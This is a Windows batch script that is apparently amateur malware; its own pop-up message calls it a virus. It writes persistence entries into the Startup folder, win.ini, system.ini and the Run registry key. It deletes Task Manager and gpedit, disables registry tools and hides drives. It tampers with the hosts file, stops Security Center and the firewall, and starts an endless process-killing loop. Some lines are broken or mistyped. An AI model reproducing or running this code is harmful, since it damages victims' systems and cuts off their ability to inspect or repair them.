"C:\DOCUME~1\ex3\LOCALS~1\Temp\F8.tmp\batchfile.bat" %systemdrive%\sand.vbs
cmd /c "echo echo.on error resume next > %systemdrive%\sand.vbs"
cmd /c "echo echo set ws = CreateObject("wscript.shell") >> %systemdrive%\.vbs"
cmd /c "echo echo ws.regwrite "HKLM\Software\kazza\Transfer\DlDir0","C:\WINDOWS\kazza\" >> %systemdrive%\sand.vbs"
cscript %systemdrive%\sand.vbs
del %systemdrive%\sand.vbs /q /f
md C:\WINDOWS\kazza
copy "C:\DOCUME~1\ex3\LOCALS~1\Temp\F8.tmp\batchfile.bat" C:\WINDOWS\kazza\
copy xkox "%systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy xkox %windir%\tank.bat
cmd /c "echo [windows] >> %windir%\win.ini"
cmd /c "echo load=%windir%\tank.bat >> %windir%\win.ini"
cmd /c "echo run=%windir%\tank.bat >> %windir%\win.ini"
cmd /c "echo nullport=None >> %windir%\win.ini"
copy xkox %systemdrive%\WINDOWS\system32\csrss.bat
cmd /c "echo [boot] >> %windir%\system.ini"
cmd /c "echo shell=csrss.exe %systemdrive%\WINDOWS\system32\csrss.bat >> %windir%\system.ini"
copy xkox %windir%\system\oobe.bat
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v oobe /t REG_SZ /d %windir%\system\oobe.bat /f
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 67108863 /f
del %windir%\system32\taskmgr.exe /q /f
del %windir%\system32\gpedit.msc /q /f
REG ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion\WPAEvents" /v OOBETimer /t REG_DWORD /d 0 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v disableregistrytools /t reg_dword /d 1 /f
cmd /c "echo dim alert >rune.vbs"
cmd /c "echo answer=MsgBox("yes its me my friend easy but bad virus isnt it",4096,"Xkox -- -- has hacked your computer i am so sorry world is bad and you have to be smart to surrvive") >>rune.vbs"
cscript rune.vbs
del rune.vbs /q /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\ /v DataBasePath /t REG_EXPAND_SZ /d "%systemroot%\System32\drivers\etc /f"
cmd /c "echo
www.google.com >>%systemdrive%\WINDOWS\system32\Drivers\Etc\Hosts"
cmd /c "echo
www.google.bg >>%systemdrive%\WINDOWS\system32\Drivers\Etc\Hosts"
cmd /c "echo
www.abv.bg >>%systemdrive%\WINDOWS\system32\Drivers\Etc\Hosts"
cmd /c "echo
www.youtube.com >>%systemdrive%\WINDOWS\system32\Drivers\Etc\Hosts"
net stop “Security Center”
net stop SharedAccess
netsh firewall set opmode mode=disable
cmd /c "echo :foieht >15789.bat"
cmd /c "echo tskill >>15789.bat"
cmd /c "echo tskill n >>15789.bat"
cmd /c "echo goto foieht >>15789.bat"
start /min 15789.bat
toq nego zasicha nod32 i kaspersky